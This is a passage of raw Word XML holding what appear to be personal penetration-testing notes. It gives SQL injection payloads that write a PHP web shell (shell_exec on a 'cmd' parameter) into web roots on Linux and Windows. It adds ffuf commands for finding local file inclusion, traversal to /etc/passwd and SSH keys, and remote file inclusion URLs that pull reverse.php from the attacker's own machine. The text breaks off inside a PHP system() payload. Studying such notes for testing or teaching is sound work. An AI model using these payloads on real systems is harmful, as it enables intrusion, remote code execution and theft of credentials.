          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;",6,7,8,9 into OUTFILE '/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951633A" w14:textId="374057FD" w:rsidR="0004548B" w:rsidRDefault="0004548B">
      <w:r>
        <w:t>or for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ABB36F" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"&lt;?php echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F803E" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;",6,7,8,9 into OUTFILE 'c:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xampp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C4E44" w14:textId="45FDBEB6" w:rsidR="0004548B" w:rsidRDefault="0004548B">
      <w:r>
        <w:t>then load it (remember OS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C1634" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"&lt;?php echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CAF17" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B" w:rsidP="0004548B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;",6,7,8,9 into OUTFILE 'c:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xampp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>htdocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cmd.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1D363" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B"/>
    <w:p w14:paraId="68F16383" w14:textId="77777777" w:rsidR="0004548B" w:rsidRDefault="0004548B"/>
    <w:p w14:paraId="71FFC213" w14:textId="2E309EB1" w:rsidR="006C6ECD" w:rsidRPr="006D3502" w:rsidRDefault="006C6ECD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D3502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A44C41F" w14:textId="2196A2F0" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:t xml:space="preserve">Try this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>when ?param</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>= seen in URL. Can be used after text box executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5A5DC" w14:textId="4B67BE10" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:t xml:space="preserve">First see if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>possible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with fuzzing directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F344C0" w14:textId="0776C169" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:r>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>wordlists/LFI/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>fi</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://URL?param=FUZZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DCF0515" w14:textId="7E574C2C" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:t>Find a property a lot of results have in common (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no. lines is 49) and filter it out using the options in the picture below</w:t>
      </w:r>
      <w:r w:rsidR="00DB5C1C">
        <w:t xml:space="preserve"> (try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB5C1C">
        <w:t>dirTraversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5C1C">
        <w:t>-OS too)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0AD26B" w14:textId="42830635" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="007D5734" w:rsidRPr="006D3502">
        <w:t>/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>wordlists/LFI/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D5734" w:rsidRPr="006D3502">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>fi</w:t>
      </w:r>
      <w:r w:rsidR="007D5734" w:rsidRPr="006D3502">
        <w:t>.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D5734" w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>-u http://</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>param</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>=FUZZ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26103078" w14:textId="33E0B895" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A36D676" wp14:editId="012757E8">
            <wp:extent cx="5731510" cy="1175385"/>
            <wp:effectExtent l="0" t="0" r="254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6072B" w14:textId="353B5466" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:t>If this has results, LFI is possible. See what worked (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../../../../../../../) and run the interesting files list with this (make sure to choose correct OS list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FAD469" w14:textId="4F2DEEF6" w:rsidR="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="007D5734" w:rsidRPr="006D3502">
        <w:t>/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="007D5734">
        <w:t>wordlists/LFI/</w:t>
      </w:r>
      <w:r>
        <w:t>LFI-gracefulsecurity-linux.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> -u http://</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>param</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../../../../../../..</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3502">
        <w:t>FUZZ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3502">
        <w:t>fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3502">
        <w:t xml:space="preserve"> 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DFCB4" w14:textId="5FA820BA" w:rsidR="006D3502" w:rsidRPr="006D3502" w:rsidRDefault="006D3502">
      <w:r>
        <w:t xml:space="preserve">Then navigate to the interesting ones in browser (try /etc/passwd too </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> doesn’t work sometimes)</w:t>
      </w:r>
      <w:r w:rsidR="00DB5C1C">
        <w:t xml:space="preserve">. If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB5C1C">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5C1C">
        <w:t xml:space="preserve"> seen, for example, research where keys are and navigate if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90FC17" w14:textId="63A2EC00" w:rsidR="006C6ECD" w:rsidRDefault="006D3502">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C6ECD">
        <w:t>Could traverse to somewhere we saved shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from a different exploit</w:t>
      </w:r>
      <w:r w:rsidR="006C6ECD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C449B75" w14:textId="51B76FDA" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:r>
        <w:t>Could try this too</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054ADD82" w14:textId="0294EBBF" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4C5706" wp14:editId="564A7C71">
            <wp:extent cx="3692966" cy="5119255"/>
            <wp:effectExtent l="0" t="0" r="3175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2642" cy="5132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4B90F" w14:textId="7665E035" w:rsidR="00ED0C7A" w:rsidRPr="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0C7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5754D4" w14:textId="5F5ABF36" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:r>
        <w:t>Try to execute file on web app via my web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376667F0" w14:textId="61B1580C" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://URL?param=http://&lt;mymachine&gt;/reverse.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B8BBD37" w14:textId="01AE838C" w:rsidR="00ED0C7A" w:rsidRDefault="00034E76" w:rsidP="00ED0C7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00ED0C7A" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://URL?param=http://&lt;mymachine&gt;/reverse.php%00</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27FA7778" w14:textId="3A0E9CAB" w:rsidR="00ED0C7A" w:rsidRDefault="00034E76" w:rsidP="00ED0C7A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00ED0C7A" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://URL?param=http://&lt;mymachine&gt;/reverse.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00ED0C7A">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B2BB2" w14:textId="632DD781" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should contain this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5C5D3" w14:textId="77777777" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A" w:rsidP="00ED0C7A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
